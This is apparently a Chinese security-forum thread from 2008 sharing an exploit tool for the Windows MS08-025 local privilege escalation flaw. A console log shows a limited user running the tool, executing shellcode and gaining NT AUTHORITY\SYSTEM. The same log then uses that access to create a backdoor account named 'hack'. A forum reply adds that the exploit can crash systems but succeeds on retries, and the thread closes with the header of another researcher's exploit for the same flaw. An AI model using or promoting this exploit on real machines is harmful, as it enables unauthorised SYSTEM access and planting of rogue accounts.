MS08-025 for win2k & win2k3 & winXP
软件作者:baicker[code]Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试(不装XP那种垃圾)PS: 测试XP SP2通过。
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系统发生 5 错误。
拒绝访问。
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
NT AUTHORITY\SYSTEM
D:\>ms08025 "net user hack /add"
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode...
D:\>命令成功完成。
D:\>net user
\\BAICKER-VMWARE 的用户帐户
-------------------------------------------------------------------------------
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:\>
[/code]
[[i] 本帖最后由 ring04h 于 2008-4-18 18:29 编辑 [/i]] 刚刚有人举报帖子和单独跟我反映 这个代码运行蓝屏
其实多试几次就好了
这种内核下的exp不稳定属正常现象.
我之前测试的时候也会蓝屏.有时是刚执行shellcode就蓝了,有时是成功执行一条命令后蓝的,有时不会蓝.
windows xpsp2 windows2003sp1 sp2 我都测试了 可以使用 就是偶尔bsod // ms08-25-exploit #1
// This exploit takes advantage of one of the vulnerabilities
// patched in the Microsoft Security bulletin MS08-25
// [url]http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx[/url]
// ---------------------------------------
// Modifications are strictly prohibited.
// For research purposes ONLY.
// ---------------------------------------
// Ruben Santamarta
// [url]www.reversemode.com[/url]
页:
[1]